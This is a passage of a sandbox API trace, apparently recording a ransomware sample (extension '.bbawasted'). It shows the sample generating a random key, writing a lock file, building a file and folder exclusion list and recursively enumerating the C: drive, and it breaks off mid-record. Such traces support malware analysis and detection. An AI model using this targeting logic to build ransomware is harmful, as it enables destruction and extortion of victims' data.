[0066.042] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x608) returned 0x5a55b0 [0066.042] IStream:RemoteSeek (in: This=0x59df80, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteRead (in: This=0x59df80, pv=0x5a55b0, cb=0x606, pcbRead=0x0 | out: pv=0x5a55b0*=0x2a, pcbRead=0x0) returned 0x0 [0066.042] IUnknown:Release (This=0x59df80) returned 0x0 [0066.042] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4700 | out: hHeap=0x580000) returned 1 [0066.042] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4468 | out: hHeap=0x580000) returned 1 [0066.042] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4020 | out: hHeap=0x580000) returned 1 [0066.042] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a3eb8 | out: hHeap=0x580000) returned 1 [0066.042] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59c5b0 | out: hHeap=0x580000) returned 1 [0066.042] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0066.042] lstrlenW (lpString="") returned 0 [0066.042] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2) returned 0x5a4870 [0066.043] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x21) returned 0x59c5b0 [0066.043] CryptAcquireContextW (in: phProv=0xf9fea4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fea4*=0x5a3f58) returned 1 [0066.338] CryptGenRandom (in: hProv=0x5a3f58, dwLen=0x21, pbBuffer=0x59c5b0 | out: pbBuffer=0x59c5b0) returned 1 [0066.338] CryptReleaseContext (hProv=0x5a3f58, dwFlags=0x0) returned 1 [0066.338] CreateFileW (lpFileName="C:\\Windows\\TEMP\\lck.log" (normalized: "c:\\windows\\temp\\lck.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0066.339] WriteFile (in: hFile=0xe8, lpBuffer=0x59c5b0*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0xf9fec0, lpOverlapped=0x0 | out: lpBuffer=0x59c5b0*, lpNumberOfBytesWritten=0xf9fec0*=0x21, lpOverlapped=0x0) returned 1 [0066.340] SetEndOfFile (hFile=0xe8) returned 1 [0066.340] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.340] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59c5b0 | out: hHeap=0x580000) returned 1 [0066.340] _wcslwr (in: _String=0x59cba8 | out: _String="*") returned="*" [0066.340] _wcslwr (in: _String=0x5a55b0 | out: _String="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0066.340] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0066.340] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x24) returned 0x59c5b0 [0066.340] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x59c5c6 | out: lpBuffer="C:\\") returned 0x4 [0066.340] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa) returned 0x59c848 [0066.340] lstrlenW (lpString="C:\\") returned 3 [0066.340] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x59c848 | out: hHeap=0x580000) returned 1 [0066.340] lstrlenW (lpString="C:\\") returned 3 [0066.340] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0066.341] lstrlenW (lpString="C:\\") returned 3 [0066.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0066.341] QueryDosDeviceW (in: lpDeviceName="C:", lpTargetPath=0xf9fe88, ucchMax=0x18 | out: lpTargetPath="\\Device\\HarddiskVolume1") returned 0x0 [0066.341] lstrlenW (lpString="C:\\") returned 3 [0066.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0066.341] lstrlenW (lpString="C:\\") returned 3 [0066.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0066.341] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x44) returned 0x5a4790 [0066.341] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xec [0066.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1004895, lpParameter=0x5a4790, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf4 [0066.342] StrChrW (lpStart="C:\\", wMatch=0x7c) returned 0x0 [0066.342] lstrlenW (lpString="C:\\") returned 3 [0066.342] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xfffe) returned 0x5a5bc0 [0066.342] lstrlenW (lpString="*") returned 1 [0066.342] lstrlenW (lpString="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned 771 [0066.342] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x60c) returned 0x5b5bc8 [0066.342] lstrcpyW (in: lpString1=0x5b5bcc, lpString2="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" | out: lpString1="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.bbawasted_info|*.bbawasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0066.342] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x250) returned 0x5a5008 [0066.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x5a47e0 [0066.343] lstrlenW (lpString="$Recycle.Bin") returned 12 [0066.345] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="Boot", cAlternateFileName="")) returned 1 [0066.345] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.345] lstrlenW (lpString="Boot") returned 4 [0066.348] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0066.348] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.348] lstrlenW (lpString="bootmgr") returned 7 [0066.348] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0066.348] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.348] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0066.382] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0066.382] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.382] lstrlenW (lpString="Config.Msi") returned 10 [0066.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName=".", cAlternateFileName="")) returned 0x5a3ef8 [0066.386] FindNextFileW (in: hFindFile=0x5a3ef8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="..", cAlternateFileName="")) returned 1 [0066.386] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.386] FindNextFileW (in: hFindFile=0x5a3ef8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="..", cAlternateFileName="")) returned 0 [0066.386] FindClose (in: hFindFile=0x5a3ef8 | out: hFindFile=0x5a3ef8) returned 1 [0066.386] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x580000) returned 1 [0066.386] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0066.386] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.387] lstrlenW (lpString="Documents and Settings") returned 22 [0066.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x5b71e8, ftCreationTime.dwLowDateTime=0x5a4020, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0066.387] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x580000) returned 1 [0066.387] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0066.387] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.387] lstrlenW (lpString="hiberfil.sys") returned 12 [0066.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName=".", cAlternateFileName="")) returned 0x5a3ef8 [0066.388] FindNextFileW (in: hFindFile=0x5a3ef8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="..", cAlternateFileName="")) returned 1 [0066.388] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.388] FindNextFileW (in: hFindFile=0x5a3ef8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0066.388] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.388] lstrlenW (lpString="All Users") returned 9 [0066.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a3f38 [0066.391] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.392] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.392] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0066.392] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.392] lstrlenW (lpString="{90140000-0016-0409-1000-0000000FF1CE}-C") returned 40 [0066.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5b9660 | out: lpFindFileData=0x5b9660*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a3f78 [0066.395] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5b9660 | out: lpFindFileData=0x5b9660*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.395] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.395] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5b9660 | out: lpFindFileData=0x5b9660*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0066.395] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.395] lstrlenW (lpString="ExcelLR.cab") returned 11 [0066.443] FindClose (in: hFindFile=0x5a3f78 | out: hFindFile=0x5a3f78) returned 1 [0066.443] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0066.443] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0066.443] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0066.444] lstrlenW (lpString="{90140000-0018-0409-1000-0000000FF1CE}-C") returned 40 [0066.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5bac68 | out: lpFindFileData=0x5bac68*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a3f78 [0066.978] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5bac68 | out: lpFindFileData=0x5bac68*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, 